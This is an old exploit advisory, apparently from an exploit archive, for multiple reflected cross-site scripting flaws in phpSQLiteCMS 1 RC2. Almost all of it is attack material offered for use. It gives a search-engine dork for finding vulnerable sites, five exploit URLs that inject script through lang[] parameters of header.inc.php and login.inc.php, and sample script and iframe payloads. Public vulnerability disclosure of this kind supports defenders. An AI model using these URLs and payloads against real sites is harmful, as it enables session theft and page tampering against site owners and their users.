phpsqlitecms-xss.txt
Posted on 23 May 2008
========================================================== phpSQLiteCMS Multiple Remote XSS Vulnerability ========================================================== AUTHOR : CWH Underground DATE : 21 May 2008 SITE : www.citec.us ##################################################### APPLICATION : phpSQLiteCMS VERSION : 1 RC2 (Lastest Version) VENDOR : http://downloads.sourceforge.net/phpsqlitecms ##################################################### DORK: "Powered By phpSQLiteCMS" ---Exploit--- [-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[home]=<XSS> [-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu]=<XSS> [-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu_page_overview]=<XSS> [-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_username]=<XSS> [-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_password]=<XSS> Example for XSS : <script>alert(123);</script> <iframe src=http://www.google.com> . ################################################################## Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C ##################################################################
